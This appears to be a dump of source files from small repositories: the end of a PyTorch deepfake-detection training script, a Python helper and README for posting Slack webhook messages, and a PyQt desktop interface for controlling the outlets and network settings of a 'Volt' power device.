{}\n#print(params)\n\ntrain_list = list(os.listdir(os.path.join(DATA_FOLDER, TRAIN_SAMPLE_FOLDER)))\n\njson_file = [file for file in train_list if file.endswith('json')][0]\nprint(f\"JSON file: {json_file}\")\n\ndef get_meta_from_json(path):\n df = pd.read_json(os.path.join(DATA_FOLDER, path, json_file))\n df = df.T\n return df\n\nmeta_train_df = get_meta_from_json(TRAIN_SAMPLE_FOLDER)\nmeta_train_df.head()\nfilenames = glob.glob('/mnt/gs18/scratch/users/asnanivi/train_sample_videos/*.mp4')\nprint(len(filenames))\n\nlabels=[]\nfor fn in meta_train_df.index[:]:\n label = meta_train_df.loc[fn]['label']\n labels.append(label) \n \n \n\naction_names=[\"REAL\",\"FAKE\"] \n# convert labels -> category\nle = LabelEncoder()\nle.fit(action_names)\n\n# show how many classes there are\nlist(le.classes_)\n\n# convert category -> 1-hot\naction_category = le.transform(action_names).reshape(-1, 1)\nenc = OneHotEncoder()\nenc.fit(action_category)\n\n# # example\n# y = ['HorseRace', 'YoYo', 'WalkingWithDog']\n# y_onehot = labels2onehot(enc, le, y)\n# y2 = onehot2labels(le, y_onehot)\n \nall_y_list = labels2cat(le, labels) # all video labels\nall_Y=torch.LongTensor(all_y_list)\nprint(all_Y.shape)\n\n\ntransform = transforms.Compose([transforms.Resize([img_x, img_y]),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\nselected_frames = np.arange(begin_frame, end_frame, skip_frame).tolist()\n# Load face detector\nmtcnn = MTCNN(margin=14, keep_all=False, factor=0.5, device=device).eval()\n# Define face detection pipeline\ndetection_pipeline = DetectionPipeline(detector=mtcnn, batch_size=60, resize=0.25)\n\n# Load facial recognition model\nresnet = InceptionResnetV1(pretrained='vggface2', device=device).eval()\n#resnet=InceptionV3(input_shape=img_shape, weights='imagenet', include_top=False, pooling='avg')\n#X = torch.zeros([1334,30,3,256,342],dtype=torch.float64).to(device)\nX=[]\n#print(X.shape)\nstart = time.time()\nn_processed = 0\nflag1=0\nwith torch.no_grad():\n for i, filename in tqdm(enumerate(filenames), total=len(filenames)):\n try:\n \n # Load frames and find faces\n faces = detection_pipeline(filename)\n #X[i,:,:,:,:]=faces\n #waste=process_faces(faces, resnet)\n #print(waste.shape)\n #print(faces)\n # Calculate embeddings\n \n \n if flag1==0:\n faces=torch.unsqueeze(faces,dim=0)\n X=faces\n \n \n if flag1!=0:\n faces=torch.unsqueeze(faces,dim=0)\n X = torch.cat([faces,X], dim=0)\n \n flag1=1\n \n print(X.shape)\n \n \n except KeyboardInterrupt:\n print('\\nStopped.')\n break\n\n except Exception as e:\n print(e)\n #X.append(None)\nprint(\"final shape\") \nprint(X.shape) \ntrain_set= X,all_Y\ntrain_dataset = data.TensorDataset(X, all_Y)\n#print(train_set)\n#train_set= Variable(torch.from_numpy(X)),all_Y\n \n#valid_set=Dataset_CRNN(data_path, test_list, test_label, selected_frames, transform=transform)\ntrain_loader = data.DataLoader(train_dataset, **params)\n#valid_loader = data.DataLoader(valid_set, **params)\n\n#for batch_idx, (X, y) in enumerate(train_loader):\n# print(batch_idx)\n# print(X)\n# print(y)\n\n# Create model\ncnn_encoder = EncoderCNN(img_x=img_x, img_y=img_y, fc_hidden1=CNN_fc_hidden1, fc_hidden2=CNN_fc_hidden2,\n drop_p=dropout_p, CNN_embed_dim=CNN_embed_dim).to(device)\n\nrnn_decoder = DecoderRNN(CNN_embed_dim=CNN_embed_dim, h_RNN_layers=RNN_hidden_layers, h_RNN=RNN_hidden_nodes, \n h_FC_dim=RNN_FC_dim, drop_p=dropout_p, num_classes=k).to(device)\n\n# Parallelize model to multiple GPUs\nif torch.cuda.device_count() > 1:\n print(\"Using\", torch.cuda.device_count(), \"GPUs!\")\n cnn_encoder = nn.DataParallel(cnn_encoder)\n rnn_decoder = nn.DataParallel(rnn_decoder)\n\ncrnn_params = list(cnn_encoder.parameters()) + list(rnn_decoder.parameters())\noptimizer = torch.optim.Adam(crnn_params, lr=learning_rate)\n\n\n# record training process\nepoch_train_losses = []\nepoch_train_scores = []\nepoch_test_losses = []\nepoch_test_scores = []\n\n# start training\nfor epoch in range(epochs):\n # train, test model\n train_losses, train_scores = train(log_interval, [cnn_encoder, rnn_decoder], device, train_loader, optimizer, epoch)\n print(epoch, \"starting\")\n # save results\n epoch_train_losses.append(train_losses)\n epoch_train_scores.append(train_scores)\n \n # save all train test results\n A = np.array(epoch_train_losses)\n B = np.array(epoch_train_scores)\n print(epoch ,\"done\")\n print(\"loss\", A)\n print(\"scores\",B)\n np.save('/mnt/ufs18/home-188/asnanivi/Desktop/Deepfake/result', A)\n np.save('/mnt/ufs18/home-188/asnanivi/Desktop/Deepfake/result', B)\n \n\n# plot\nfig = plt.figure(figsize=(10, 4))\nplt.subplot(121)\nplt.plot(np.arange(1, epochs + 1), A[:, -1]) # train loss (on epoch end)\nplt.title(\"model loss\")\nplt.xlabel('epochs')\nplt.ylabel('loss')\nplt.legend(['train', 'test'], loc=\"upper left\")\n# 2nd figure\nplt.subplot(122)\nplt.plot(np.arange(1, epochs + 1), B[:, -1]) # train accuracy (on epoch end)\nplt.title(\"training scores\")\nplt.xlabel('epochs')\nplt.ylabel('accuracy')\nplt.legend(['train', 'test'], loc=\"upper left\")\ntitle = \"./fig_UCF101_CRNN.png\"\nplt.savefig(title, dpi=600)\n# plt.close(fig)\nplt.show()\n"
}
] | 8 |
akakou/Incoming-WebHooks-Bot
|
https://github.com/akakou/Incoming-WebHooks-Bot
|
2462df844a5af4efe46f32530655a5488a8959a0
|
d725374e433fd4351bfced6fdf10f05b337737e5
|
4e4651e5c30788f5c7e93a5f486631520b08ce4d
|
refs/heads/master
| 2021-01-21T09:47:41.686680 | 2017-05-18T11:13:33 | 2017-05-18T11:13:33 | 91,668,223 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4797687828540802,
"alphanum_fraction": 0.4826589524745941,
"avg_line_length": 25.615385055541992,
"blob_id": "74d7a039a6f2d006e8b3dcf6c8dfd6aae5f28c6c",
"content_id": "af84b9ebc0ca9fab1b8e01bf2dfb1d12ca03cd75",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 692,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 26,
"path": "/incoming_webhooks.py",
"repo_name": "akakou/Incoming-WebHooks-Bot",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n'''This program is class for incoming webhooks'''\n\nimport requests\nimport json\n\n\nclass IncomingWebhooks:\n \"\"\"Incoming webhooks\"\"\"\n\n def __init__(self, url='', text=u'', username=u'', icon_emoji=u'', link_names=0):\n \"\"\"Set Property\"\"\"\n self.url = url\n self.data = json.dumps({\n 'text': text, # text\n 'username': username, # user name\n 'icon_emoji': icon_emoji, # profile emoji\n 'link_names': link_names, # mention\n })\n\n def send(self):\n \"\"\"Send to Slack\"\"\"\n requests.post(\n self.url,\n self.data\n )\n"
},
{
"alpha_fraction": 0.7041965126991272,
"alphanum_fraction": 0.708290696144104,
"avg_line_length": 20.2391300201416,
"blob_id": "6ba086d68fd84dfc289751a3bfdf155530099bac",
"content_id": "b833073f17133cb04d6e297ec808c373de42b68f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 977,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 46,
"path": "/README.md",
"repo_name": "akakou/Incoming-WebHooks-Bot",
"src_encoding": "UTF-8",
"text": "# Incoming-WebHooks-Bot\n## What is it\nPython Modeule for Incoming WebHooks Bot. \nYou can send to slack with Incoming WebHooks ! \n\n## How to install\n### First\nThis modeule can set to move your program's directry.\n\n### requests Modeule\nYou must install `requests` module to use this modeule.\nInstall `pip` and run this command.\n```shell\npip install requests\n```\n\n## How to use\n### Source\n```python\nbot = incoming_webhooks.IncomingWebhooks(url, text, username, icon_emoji, link_names)\nbot.send()\n```\n### Meaning of each variable\n* url : incoming webhooks URL \n* text : message you want to send\n* username : bot name\n* icon_emoji : bot icon\n* link_names : if you want mention, input 1.\n\n\n## Example\n```python\n# coding:utf-8\nimport incoming_webhooks\n\n# Property\nurl = \"https://hooks.slack.com/services/\"\ntext = \"hello\"\nusername = \"bot\"\nicon_emoji = \":+1:\"\nlink_names = 1\n\n# Run\nbot = incoming_webhooks.IncomingWebhooks(url, text, username, icon_emoji, link_names)\nbot.send()\n```\n"
}
] | 2 |
volt-tecnologia/API_PYTHON_Example
|
https://github.com/volt-tecnologia/API_PYTHON_Example
|
96bb3f9aa679ccac09036787e1f70c19f8eba305
|
b42a08bcf9ac3a946e01a9e051baec26b5f41219
|
69109d4d899aa4981fc6bf17e870ad91afbedc98
|
refs/heads/master
| 2020-10-01T19:30:55.586281 | 2020-01-23T13:26:59 | 2020-01-23T13:26:59 | 227,608,711 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5739480257034302,
"alphanum_fraction": 0.5887994766235352,
"avg_line_length": 39.89873504638672,
"blob_id": "e698ab499fb24a1fa95d1a637d3f85f56191e17f",
"content_id": "89ec5f99cf3c51661831424c20f53bcf0483acdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3239,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 79,
"path": "/main.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "#from PyQt5 import QtGui\n#from PyQt5.QtCore import QRect\nfrom PyQt5.QtWidgets import QApplication,QPushButton, QMainWindow\nfrom main_ui import *\nfrom voltdevice import VoltDevice\nimport sys\nclass Window(QMainWindow):\n def __init__(self, parent=None):\n self.colorVerde = 'rgb(0,255,102)'\n QtWidgets.QTabWidget.__init__(self, parent)\n\n self.ui = WindowUI()\n self.ui.setupUi(self)\n\n #self.vd = VoltDevice('admin','voltvolt','192.168.0.90')\n #if self.vd.lastInfo !=0:\n # self.ui.updateUI(self.vd)\n \n def login(self):\n if(self.ui.btConnect.text() == \"Conectar\"):\n \n self.vd = VoltDevice(self.ui.userField.text(), self.ui.passField.text(), self.ui.ipField.text())\n resp = self.vd.updateInfo()\n if resp == 200 :\n print('Login sucesso!!')\n self.ui.alert(self, 'Sucesso','Login efetuado com sucesso!!')\n self.ui.btConnect.setText(\"Desconectar\")\n self.ui.updateUI(self.vd)\n elif resp == 401: \n print('Falha login')\n self.ui.alert(self, 'Falha','Falha de autenticação!!')\n\n elif resp == 500: \n print('Falha login')\n self.ui.alert(self, 'Falha','Equipamento inacessível!!')\n else:\n self.ui.btConnect.setText(\"Conectar\")\n self.ui.enableComponents(False)\n\n def controlTomada(self, tomada):\n if(self.vd.lastInfo !=0 ):\n resp = self.vd.ctrlAc(tomada,0)\n if resp.status_code == 200:\n print(\"comando enviado com sucesso\")\n else:\n self.ui.alert(self,\"Erro \"+str(resp.status_code),resp.content.decode())\n\n self.ui.updateUI(self.vd)\n\n def saveEthernet(self):\n if(self.vd.lastInfo !=0):\n resp = self.vd.configEthernet(self.ui.dhcp.isChecked(), self.ui.hostname.text(), self.ui.ip.text(),self.ui.gateway.text(),self.ui.mask.text(),self.ui.dns1.text(), self.ui.dns2.text()) \n if(resp.status_code == 200):\n self.ui.alert(self, 'Sucesso','Configuração executada com sucesso!!')\n else: self.ui.alert(self, 'Falha','Falha!!')\n\n def selectTomada(self):\n if(self.ui.cbTomada.currentIndex() > 0 and self.vd.lastInfo !=0):\n nome = self.vd.getNomeAC(int(self.ui.cbTomada.currentText()))\n self.ui.nomeTomadaField.setText(nome)\n self.ui.cbHabilitaTomada.setChecked(self.vd.getRmac(int(self.ui.cbTomada.currentText())))\n\n def configTomada(self):\n if(self.ui.cbTomada.currentIndex() > 0 and self.vd.lastInfo !=0): \n resp = self.vd.ctrlAc(self.ui.cbTomada.currentIndex(), 1,self.ui.cbHabilitaTomada.isChecked() , self.ui.nomeTomadaField.text())\n print(resp.status_code)\n if(hasattr(resp, 'status_code') and resp.status_code == 200):\n self.ui.alert(self, 'Sucesso','Configuração executada com sucesso!!')\n else: self.ui.alert(self, 'Falha','Falha!!')\n self.ui.updateUI(self.vd)\n\n def alert(self, msg):\n print(msg)\n\nApp = QApplication(sys.argv)\nwindow = Window()\n\nwindow.show()\nsys.exit(App.exec())\n\n"
},
{
"alpha_fraction": 0.612516462802887,
"alphanum_fraction": 0.6661503911018372,
"avg_line_length": 52.9752311706543,
"blob_id": "7d8b3354cab8b3515c541e972dc11e8a6b2cf3f4",
"content_id": "8c6aae1f5e22803c84cc511f85bd580f64e1192a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17440,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 323,
"path": "/main_ui.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\dialog.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox\n\n\nclass WindowUI(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(1176, 390)\n self.showTomada1 = QtWidgets.QPushButton(Dialog)\n self.showTomada1.setGeometry(QtCore.QRect(40, 280, 101, 51))\n self.showTomada1.setObjectName(\"showTomada1\")\n self.showTomada2 = QtWidgets.QPushButton(Dialog)\n self.showTomada2.setGeometry(QtCore.QRect(150, 280, 101, 51))\n self.showTomada2.setObjectName(\"showTomada2\")\n self.showTomada4 = QtWidgets.QPushButton(Dialog)\n self.showTomada4.setGeometry(QtCore.QRect(370, 280, 101, 51))\n self.showTomada4.setObjectName(\"showTomada4\")\n self.showTomada3 = QtWidgets.QPushButton(Dialog)\n self.showTomada3.setGeometry(QtCore.QRect(260, 280, 101, 51))\n self.showTomada3.setObjectName(\"showTomada3\")\n self.showTomada8 = QtWidgets.QPushButton(Dialog)\n self.showTomada8.setGeometry(QtCore.QRect(810, 280, 101, 51))\n self.showTomada8.setObjectName(\"showTomada8\")\n self.showTomada6 = QtWidgets.QPushButton(Dialog)\n self.showTomada6.setGeometry(QtCore.QRect(590, 280, 101, 51))\n self.showTomada6.setObjectName(\"showTomada6\")\n self.showTomada7 = QtWidgets.QPushButton(Dialog)\n self.showTomada7.setGeometry(QtCore.QRect(700, 280, 101, 51))\n self.showTomada7.setObjectName(\"showTomada7\")\n self.showTomada5 = QtWidgets.QPushButton(Dialog)\n self.showTomada5.setGeometry(QtCore.QRect(480, 280, 101, 51))\n self.showTomada5.setObjectName(\"showTomada5\")\n self.showTomada10 = QtWidgets.QPushButton(Dialog)\n self.showTomada10.setGeometry(QtCore.QRect(1030, 280, 101, 51))\n self.showTomada10.setObjectName(\"showTomada10\")\n self.showTomada9 = QtWidgets.QPushButton(Dialog)\n self.showTomada9.setGeometry(QtCore.QRect(920, 280, 101, 51))\n self.showTomada9.setObjectName(\"showTomada9\")\n self.groupBox = QtWidgets.QGroupBox(Dialog)\n self.groupBox.setGeometry(QtCore.QRect(840, 20, 261, 241))\n self.groupBox.setObjectName(\"groupBox\")\n self.dhcp = QtWidgets.QCheckBox(self.groupBox)\n self.dhcp.setGeometry(QtCore.QRect(16, 20, 70, 17))\n self.dhcp.setObjectName(\"dhcp\")\n self.btSaveEthernet = QtWidgets.QPushButton(self.groupBox)\n self.btSaveEthernet.setGeometry(QtCore.QRect(10, 210, 241, 23))\n self.btSaveEthernet.setObjectName(\"btSaveEthernet\")\n self.label_9 = QtWidgets.QLabel(self.groupBox)\n self.label_9.setGeometry(QtCore.QRect(6, 50, 61, 16))\n self.label_9.setObjectName(\"label_9\")\n self.label_10 = QtWidgets.QLabel(self.groupBox)\n self.label_10.setGeometry(QtCore.QRect(6, 100, 47, 13))\n self.label_10.setObjectName(\"label_10\")\n self.label_11 = QtWidgets.QLabel(self.groupBox)\n self.label_11.setGeometry(QtCore.QRect(6, 150, 101, 16))\n self.label_11.setObjectName(\"label_11\")\n self.label_12 = QtWidgets.QLabel(self.groupBox)\n self.label_12.setGeometry(QtCore.QRect(140, 50, 47, 13))\n self.label_12.setObjectName(\"label_12\")\n self.label_13 = QtWidgets.QLabel(self.groupBox)\n self.label_13.setGeometry(QtCore.QRect(140, 100, 91, 16))\n self.label_13.setObjectName(\"label_13\")\n self.label_14 = QtWidgets.QLabel(self.groupBox)\n self.label_14.setGeometry(QtCore.QRect(140, 150, 101, 16))\n self.label_14.setObjectName(\"label_14\")\n self.hostname = QtWidgets.QLineEdit(self.groupBox)\n self.hostname.setGeometry(QtCore.QRect(6, 70, 113, 20))\n self.hostname.setObjectName(\"hostname\")\n self.gateway = QtWidgets.QLineEdit(self.groupBox)\n self.gateway.setGeometry(QtCore.QRect(140, 70, 113, 20))\n self.gateway.setObjectName(\"gateway\")\n self.ip = QtWidgets.QLineEdit(self.groupBox)\n self.ip.setGeometry(QtCore.QRect(6, 120, 113, 20))\n self.ip.setObjectName(\"ip\")\n self.dns1 = QtWidgets.QLineEdit(self.groupBox)\n self.dns1.setGeometry(QtCore.QRect(140, 120, 113, 20))\n self.dns1.setObjectName(\"dns1\")\n self.mask = QtWidgets.QLineEdit(self.groupBox)\n self.mask.setGeometry(QtCore.QRect(6, 170, 113, 20))\n self.mask.setObjectName(\"mask\")\n self.dns2 = QtWidgets.QLineEdit(self.groupBox)\n self.dns2.setGeometry(QtCore.QRect(140, 170, 113, 20))\n self.dns2.setObjectName(\"dns2\")\n self.ipField = QtWidgets.QLineEdit(Dialog)\n self.ipField.setGeometry(QtCore.QRect(70, 20, 113, 20))\n self.ipField.setObjectName(\"ipField\")\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(20, 20, 21, 16))\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(Dialog)\n self.label_2.setGeometry(QtCore.QRect(20, 50, 47, 13))\n self.label_2.setObjectName(\"label_2\")\n self.userField = QtWidgets.QLineEdit(Dialog)\n self.userField.setGeometry(QtCore.QRect(70, 50, 113, 20))\n self.userField.setObjectName(\"userField\")\n self.label_3 = QtWidgets.QLabel(Dialog)\n self.label_3.setGeometry(QtCore.QRect(190, 50, 47, 13))\n self.label_3.setObjectName(\"label_3\")\n self.passField = QtWidgets.QLineEdit(Dialog)\n self.passField.setGeometry(QtCore.QRect(230, 50, 113, 20))\n self.passField.setObjectName(\"passField\")\n self.label_4 = QtWidgets.QLabel(Dialog)\n self.label_4.setGeometry(QtCore.QRect(20, 130, 47, 13))\n self.label_4.setObjectName(\"label_4\")\n self.label_5 = QtWidgets.QLabel(Dialog)\n self.label_5.setGeometry(QtCore.QRect(20, 160, 71, 16))\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(Dialog)\n self.label_6.setGeometry(QtCore.QRect(20, 190, 71, 16))\n self.label_6.setObjectName(\"label_6\")\n self.groupBox_2 = QtWidgets.QGroupBox(Dialog)\n self.groupBox_2.setGeometry(QtCore.QRect(610, 110, 191, 151))#self.groupBox_2.setGeometry(QtCore.QRect(610, 140, 181, 121))\n self.groupBox_2.setObjectName(\"groupBox_2\")\n self.label_7 = QtWidgets.QLabel(self.groupBox_2)\n self.label_7.setGeometry(QtCore.QRect(10, 20, 47, 13))\n self.label_7.setObjectName(\"label_7\")\n self.nomeTomadaField = QtWidgets.QLineEdit(self.groupBox_2)\n self.nomeTomadaField.setGeometry(QtCore.QRect(60, 50, 113, 20))\n self.nomeTomadaField.setObjectName(\"nomeTomadaField\")\n self.label_8 = QtWidgets.QLabel(self.groupBox_2)\n self.label_8.setGeometry(QtCore.QRect(10, 50, 47, 13))\n self.label_8.setObjectName(\"label_8\")\n self.btRenamePort = QtWidgets.QPushButton(self.groupBox_2)\n self.btRenamePort.setGeometry(QtCore.QRect(10, 120, 171, 23))#self.btRenamePort.setGeometry(QtCore.QRect(4, 80, 171, 23))\n self.btRenamePort.setObjectName(\"btRenamePort\")\n self.cbTomada = QtWidgets.QComboBox(self.groupBox_2)\n self.cbTomada.setGeometry(QtCore.QRect(60, 20, 69, 22))\n self.cbTomada.setObjectName(\"cbTomada\")\n\n self.cbHabilitaTomada = QtWidgets.QCheckBox(self.groupBox_2)\n self.cbHabilitaTomada.setGeometry(QtCore.QRect(10, 80, 70, 17))\n self.cbHabilitaTomada.setObjectName(\"cbHabilitaTomada\")\n\n self.btConnect = QtWidgets.QPushButton(Dialog)\n self.btConnect.setGeometry(QtCore.QRect(380, 50, 75, 23))\n self.btConnect.setObjectName(\"btConnect\")\n self.uptimeField = QtWidgets.QLineEdit(Dialog)\n self.uptimeField.setGeometry(QtCore.QRect(100, 130, 113, 20))\n self.uptimeField.setObjectName(\"uptimeField\")\n self.tempField = QtWidgets.QLineEdit(Dialog)\n self.tempField.setGeometry(QtCore.QRect(100, 160, 113, 20))\n self.tempField.setObjectName(\"tempField\")\n self.dataHoraField = QtWidgets.QLineEdit(Dialog)\n self.dataHoraField.setGeometry(QtCore.QRect(100, 190, 113, 20))\n self.dataHoraField.setObjectName(\"dataHoraField\")\n\n self.nt1 = QtWidgets.QLineEdit(Dialog)\n self.nt1.setGeometry(QtCore.QRect(40, 340, 101, 20))\n self.nt1.setReadOnly(True)\n self.nt1.setObjectName(\"nt1\")\n self.nt2 = QtWidgets.QLineEdit(Dialog)\n self.nt2.setGeometry(QtCore.QRect(150, 340, 101, 20))\n self.nt2.setReadOnly(True)\n self.nt2.setObjectName(\"nt2\")\n self.nt3 = QtWidgets.QLineEdit(Dialog)\n self.nt3.setGeometry(QtCore.QRect(260, 340, 101, 20))\n self.nt3.setReadOnly(True)\n self.nt3.setObjectName(\"nt3\")\n self.nt4 = QtWidgets.QLineEdit(Dialog)\n self.nt4.setGeometry(QtCore.QRect(370, 340, 101, 20))\n self.nt4.setReadOnly(True)\n self.nt4.setObjectName(\"nt4\")\n self.nt5 = QtWidgets.QLineEdit(Dialog)\n self.nt5.setGeometry(QtCore.QRect(480, 340, 101, 20))\n self.nt5.setReadOnly(True)\n self.nt5.setObjectName(\"nt5\")\n self.nt6 = QtWidgets.QLineEdit(Dialog)\n self.nt6.setGeometry(QtCore.QRect(590, 340, 101, 20))\n self.nt6.setReadOnly(True)\n self.nt6.setObjectName(\"nt6\")\n self.nt7 = QtWidgets.QLineEdit(Dialog)\n self.nt7.setGeometry(QtCore.QRect(700, 340, 101, 20))\n self.nt7.setReadOnly(True)\n self.nt7.setObjectName(\"nt7\")\n self.nt8 = QtWidgets.QLineEdit(Dialog)\n self.nt8.setGeometry(QtCore.QRect(810, 340, 101, 20))\n self.nt8.setReadOnly(True)\n self.nt8.setObjectName(\"nt8\")\n self.nt9 = QtWidgets.QLineEdit(Dialog)\n self.nt9.setGeometry(QtCore.QRect(920, 340, 101, 20))\n self.nt9.setReadOnly(True)\n self.nt9.setObjectName(\"nt9\")\n self.nt10 = QtWidgets.QLineEdit(Dialog)\n self.nt10.setGeometry(QtCore.QRect(1030, 340, 101, 20))\n self.nt10.setReadOnly(True)\n self.nt10.setObjectName(\"nt10\")\n\n self.retranslateUi(Dialog)\n self.initHandlers(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.showTomada1.setText(_translate(\"Dialog\", \"TOMADA1\"))\n self.showTomada2.setText(_translate(\"Dialog\", \"TOMADA2\"))\n self.showTomada4.setText(_translate(\"Dialog\", \"TOMADA4\"))\n self.showTomada3.setText(_translate(\"Dialog\", \"TOMADA3\"))\n self.showTomada8.setText(_translate(\"Dialog\", \"TOMADA8\"))\n self.showTomada6.setText(_translate(\"Dialog\", \"TOMADA6\"))\n self.showTomada7.setText(_translate(\"Dialog\", \"TOMADA7\"))\n self.showTomada5.setText(_translate(\"Dialog\", \"TOMADA5\"))\n self.showTomada10.setText(_translate(\"Dialog\", \"TOMADA10\"))\n self.showTomada9.setText(_translate(\"Dialog\", \"TOMADA9\"))\n self.groupBox.setTitle(_translate(\"Dialog\", \"Configuração de Rede\"))\n self.dhcp.setText(_translate(\"Dialog\", \"DHCP\"))\n self.btSaveEthernet.setText(_translate(\"Dialog\", \"Salvar\"))\n self.label_9.setText(_translate(\"Dialog\", \"Hostname\"))\n self.label_10.setText(_translate(\"Dialog\", \"IP\"))\n self.label_11.setText(_translate(\"Dialog\", \"Máscara de rede\"))\n self.label_12.setText(_translate(\"Dialog\", \"Gateway\"))\n self.label_13.setText(_translate(\"Dialog\", \"DNS Primário\"))\n self.label_14.setText(_translate(\"Dialog\", \"DNS Secundário\"))\n self.label.setText(_translate(\"Dialog\", \"IP:\"))\n self.label_2.setText(_translate(\"Dialog\", \"Usuário:\"))\n self.label_3.setText(_translate(\"Dialog\", \"Senha:\"))\n self.label_4.setText(_translate(\"Dialog\", \"Uptime:\"))\n self.label_5.setText(_translate(\"Dialog\", \"Temperatura:\"))\n self.label_6.setText(_translate(\"Dialog\", \"Data e Hora:\"))\n self.groupBox_2.setTitle(_translate(\"Dialog\", \"Configurar Tomada\"))#self.groupBox_2.setTitle(_translate(\"Dialog\", \"Renomear porta\"))\n self.label_7.setText(_translate(\"Dialog\", \"Porta\"))\n self.label_8.setText(_translate(\"Dialog\", \"Nome\"))\n self.btRenamePort.setText(_translate(\"Dialog\", \"Salvar\"))\n self.cbHabilitaTomada.setText(_translate(\"Dialog\", \"Habilitada\"))\n self.btConnect.setText(_translate(\"Dialog\", \"Conectar\"))\n self.cbTomada.addItems(['','1','2','3','4','5','6','7','8','9','10'])\n\n self.ipField.setText('192.168.0.91')\n self.userField.setText('admin')\n self.passField.setText('voltvolt')\n\n def initHandlers(self, Dialog):\n self.btConnect.clicked.connect(Dialog.login);\n self.showTomada1.clicked.connect(lambda: Dialog.controlTomada(1))\n self.showTomada2.clicked.connect(lambda: Dialog.controlTomada(2))\n self.showTomada3.clicked.connect(lambda: Dialog.controlTomada(3))\n self.showTomada4.clicked.connect(lambda: Dialog.controlTomada(4))\n self.showTomada5.clicked.connect(lambda: Dialog.controlTomada(5))\n self.showTomada6.clicked.connect(lambda: Dialog.controlTomada(6))\n self.showTomada7.clicked.connect(lambda: Dialog.controlTomada(7))\n self.showTomada8.clicked.connect(lambda: Dialog.controlTomada(8))\n self.showTomada9.clicked.connect(lambda: Dialog.controlTomada(9))\n self.showTomada10.clicked.connect(lambda: Dialog.controlTomada(10))\n self.cbTomada.currentIndexChanged.connect(Dialog.selectTomada)\n self.btRenamePort.clicked.connect(Dialog.configTomada)\n self.btSaveEthernet.clicked.connect(Dialog.saveEthernet)\n \n def enableComponents(self, enable):\n self.uptimeField.setEnabled(enable)\n self.tempField.setEnabled(enable)\n self.dataHoraField.setEnabled(enable)\n self.showTomada1.setEnabled(enable)\n\n self.showTomada2.setEnabled(enable)\n self.showTomada3.setEnabled(enable)\n self.showTomada4.setEnabled(enable)\n self.showTomada5.setEnabled(enable)\n self.showTomada6.setEnabled(enable)\n self.showTomada7.setEnabled(enable)\n self.showTomada8.setEnabled(enable)\n self.showTomada9.setEnabled(enable)\n self.showTomada10.setEnabled(enable)\n self.hostname.setEnabled(enable)\n self.ip.setEnabled(enable)\n self.gateway.setEnabled(enable)\n self.mask.setEnabled(enable)\n self.dns1.setEnabled(enable)\n self.dns2.setEnabled(enable)\n self.dhcp.setEnabled(enable)\n\n def updateUI(self, vd):\n colorVerde = 'rgb(0,255,102)'\n print(vd.updateInfo())\n print('Atualiza ui')\n if(vd.lastInfo != 0):\n self.enableComponents(True)\n self.uptimeField.setText(vd.getUptime())\n self.tempField.setText(vd.lastInfo['temp']+' °C')\n self.dataHoraField.setText(vd.getDate()+'-'+vd.getTime())\n self.showTomada1.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(1) else (colorVerde if vd.getAc(1) else \"red\"))+\"\");\n\n self.showTomada2.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(2) else (colorVerde if vd.getAc(2) else \"red\"))+\"\");\n self.showTomada3.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(3) else (colorVerde if vd.getAc(3) else \"red\"))+\"\");\n self.showTomada4.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(4) else (colorVerde if vd.getAc(4) else \"red\"))+\"\");\n self.showTomada5.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(5) else (colorVerde if vd.getAc(5) else \"red\"))+\"\");\n self.showTomada6.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(6) else (colorVerde if vd.getAc(6) else \"red\"))+\"\");\n self.showTomada7.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(7) else (colorVerde if vd.getAc(7) else \"red\"))+\"\");\n self.showTomada8.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(8) else (colorVerde if vd.getAc(8) else \"red\"))+\"\");\n self.showTomada9.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(9) else (colorVerde if vd.getAc(9) else \"red\"))+\"\");\n self.showTomada10.setStyleSheet(\"background-color:\"+(\"gray\" if not vd.getRmac(10) else (colorVerde if vd.getAc(10) else \"red\"))+\"\");\n self.hostname.setText(vd.lastInfo['devhost'])\n self.ip.setText(vd.lastInfo['devip'])\n self.gateway.setText(vd.lastInfo['devgtw'])\n self.mask.setText(vd.lastInfo['devmask'])\n self.dns1.setText(vd.lastInfo['devdns1'])\n self.dns2.setText(vd.lastInfo['devdns2'])\n 